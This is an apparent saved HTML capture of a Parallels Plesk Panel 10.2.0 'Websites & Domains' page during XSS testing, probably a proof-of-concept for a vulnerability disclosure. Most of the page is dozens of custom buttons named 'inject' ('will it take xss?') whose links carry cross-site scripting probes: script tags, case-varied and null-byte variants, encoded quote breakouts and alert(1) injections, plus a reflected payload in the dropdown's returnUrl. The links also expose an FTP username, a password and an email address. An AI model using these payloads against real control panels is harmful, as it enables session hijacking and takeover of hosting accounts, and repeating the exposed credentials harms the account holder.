stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of 
websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"%0066f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27%253ca%253e3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-but
ton_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"fdf080d9513e20f46babcaf7","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"47a92%2522%253baa99fdd1270?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-69915200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e27d6%2522%253b9ddf3b95647?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-6a0856c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3d5a5%2522%252dalert%25281%2529%252d%25225ca54b544?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-77ac57e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4d8c7%2522%252dalert%25281%2529%252d%25221949039db7c?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-78d38260-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"614b3%255c%2522%253be210f06fb27?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8205b240-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"4f900%255c%2522%253b6cc1851587?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-839cbd60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-896a1760-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-8b4167a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"9f22c%253c%252fscript%253e92757840c8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8d69a6a0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2e1f%253c%252fscript%253ee4b7ce199c3?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-8f4a7c60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%009f22c<\/script>92757840c8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-91112300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00d2e1f<\/script>e4b7ce199c3?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-935f7800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-947abba0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-96bd29c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"aea12%253c%252fScRiPt%2520%253e2e0a3728b8?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-982bbd80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7efb5%253c%252fScRiPt%2520%253e05c4f3b01c2?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9a708d00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00aea12<\/ScRiPt%20>2e0a3728b8?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-9bd0d880-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007efb5<\/ScRiPt%20>05c4f3b01c2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-9e075fc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"13e85%2527%253b2fac11d343e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-a326f560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d2f63%2527%252dalert%25281%2529%252d%25278e70213d4f4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab68ba60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c75a4%255c%2527%253b6186c64b550?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b1b90000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b5843100-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"7d463%253c%252fscript%253e490b561a81?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-b75b8140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%007d463<\/script>490b561a81?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b93eb860-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bb4cc840-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f%253c%252fScRiPt%2520%253e2cdf6c3b534?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd4ef140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bf2b0440-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"83b38%2522%253b79ac1f4c99d?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-df4b32e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"683d4%2522%252dalert%25281%2529%252d%25225babbed5232?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e2689f80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a881a%2522%253bcc41ad8a12?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e47910c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e1a57%255c%2522%253b30bc91affda?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e5e08060-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3336f%2522%252dalert%25281%2529%252d%25224d488d471d0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e7f35300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-e83f7f00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56%253c%252fscript%253ebca635fbfb?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e9a22be0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb17e3c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7764%255c%2522%253b55ff7405d87?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb4c4200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ec62c2e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
